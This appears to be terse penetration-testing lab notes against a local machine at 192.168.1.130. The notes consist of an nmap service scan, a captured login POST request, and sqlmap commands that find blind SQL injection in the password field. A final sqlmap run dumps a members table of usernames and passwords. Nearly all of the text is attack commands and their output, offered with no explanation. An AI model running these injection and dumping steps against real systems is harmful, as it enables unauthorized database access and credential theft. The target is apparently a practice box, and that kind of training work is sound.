PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) | ssh-hostkey: | 1024 9bad4ff21ec5f23914b9d3a00be84171 (DSA) |_ 2048 8540c6d541260534adf86ef2a76b4f0e (RSA) 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch |_http-title: Site doesn't have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.33
POST /checklogin.php HTTP/1.1 Host: 192.168.1.130 Content-Length: 44 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.1.130 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.1.130/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close
myusername=admin&mypassword=123&Submit=Login 123
sqlmap -r 123 --level 3 --batch
sqlmap identified the following injection point(s) with a total of 1428 HTTP(s) requests: --- Parameter: mypassword (POST) Type: boolean-based blind Type: time-based blind ---
sqlmap -r 123 --level 3 --batch -D members -T members --dump -C "username,password"
Database: members Table: members [2 entries] +----------+-----------------------+ | username | password | +----------+-----------------------+ | robert | ADGAdsafdfwt4gadfga== | | john | MyNameIsJohn | +----------+-----------------------+